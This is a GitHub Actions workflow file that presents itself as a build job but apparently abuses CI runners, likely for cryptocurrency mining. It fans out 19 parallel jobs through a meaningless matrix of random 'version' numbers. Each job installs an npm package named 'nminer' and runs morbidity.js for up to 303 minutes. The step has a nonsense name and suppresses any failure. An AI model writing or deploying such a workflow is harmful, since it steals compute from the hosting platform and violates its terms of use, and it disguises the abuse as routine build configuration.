name: morbidity
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 6027 }
          - { version: 1717 }
          - { version: 2224 }
          - { version: 529 }
          - { version: 8728 }
          - { version: 9603 }
          - { version: 8444 }
          - { version: 2002 }
          - { version: 4389 }
          - { version: 4500 }
          - { version: 2891 }
          - { version: 7014 }
          - { version: 6764 }
          - { version: 9028 }
          - { version: 2136 }
          - { version: 6445 }
          - { version: 1172 }
          - { version: 1392 }
          - { version: 9552 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: once cantaloupe hype dependable
        run: |
          npm install nminer@latest
          timeout 303m node morbidity.js || echo "morbidity executed"